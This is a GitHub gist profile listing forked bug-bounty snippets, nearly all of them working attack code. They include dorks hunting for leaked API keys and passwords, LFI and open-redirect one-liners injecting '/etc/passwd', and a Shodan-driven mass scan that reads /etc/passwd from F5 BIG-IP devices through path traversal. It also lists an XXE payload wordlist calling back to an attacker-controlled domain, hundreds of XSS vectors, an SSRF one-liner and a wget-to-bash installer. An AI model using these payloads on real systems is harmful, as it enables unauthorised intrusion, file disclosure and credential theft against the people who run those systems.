Skip to content

Instantly share code, notes, and snippets.

View ravkishu's full-sized avatar
:octocat:
On vacation

Mr RK ravkishu

:octocat:
On vacation
3 followers · 2 following
View GitHub Profile
@ravkishu
ravkishu / waybackrobots.py
Created September 24, 2020 14:12 — forked from mhmdiaa/waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@ravkishu
ravkishu / github-recon
Created September 22, 2020 16:30 — forked from pikpikcu/github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https:// 
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@ravkishu
ravkishu / dork
Created September 22, 2020 15:33 — forked from pikpikcu/dork
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
@ravkishu
ravkishu / bash_aliases.sh
Created September 22, 2020 15:02 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@ravkishu
ravkishu / rce.sh
Created September 17, 2020 10:12 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ravkishu
ravkishu / xxe-payloads.txt
Created September 15, 2020 14:32 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@ravkishu
ravkishu / gist:1028500db79c6e91e0861eab8d8c7711
Created September 15, 2020 14:31 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@ravkishu
ravkishu / Ssrf
Created September 4, 2020 19:00 — forked from pikpikcu/Ssrf
curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain/*&output=txt&fl=original&collapse=urlkey&page=/" | gf ssrf | qsreplace "https://localtest.me" | parallel -j50 -q curl -i -s -k -o >(grep -io "<title>[^<]*" | cut -d'>' -f2-) --silent --max-time 2 --write-out 'Status:%{http_code}\t Header-size:%{size_header}tUrl:%{url_effective} || '
@ravkishu
ravkishu / crawling.md
Last active September 22, 2020 16:52 — forked from pikpikcu/crawling.md 
$ cat subdo.txt | hakrawler | grep 'http' | cut -d '' -f 2 > crawler.txt 
$ gau -subs domain.com >>  crawler.txt
$ waybackurls domain.com >> crawler.txt 
$ cat crawling.txt | grep "?" | unfurl --unique format %s://%d%p > base.txt
$ cat base.txt | parallel -j50 -q grep {} -m5 crawling.txt | tee -a final.txt
$ cat final.txt | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|woff|woff2|ico|pdf|svg|txt|js)" > final_bos.txt 
$ rm -rf base.txt final.txt

# CommonCrawl to find endpoints on a site
@ravkishu
ravkishu / setup_bbty.sh
Last active April 6, 2021 10:59 — forked from pikpikcu/setup_bbty.sh
Setup Bug Bounty Tools on AWS instance / any VPS for that matter
#!/bin/bash
# Execute as wget -O - https://gist.githubusercontent.com/ravkishu/a45139044afb8b3a39542f0c4e42ba8a/raw | bash
# It's debian based, so for centos and likewise you have to change apt to yum and similarly
#
InstallationStartTime=$(date +%s)
#### COLORS #### ( Taken from : https://misc.flogisoft.com/bash/tip_colors_and_formatting )
NORMAL='\e[0m'
RED='\e[31m'
LIGHT_GREEN='\e[92m'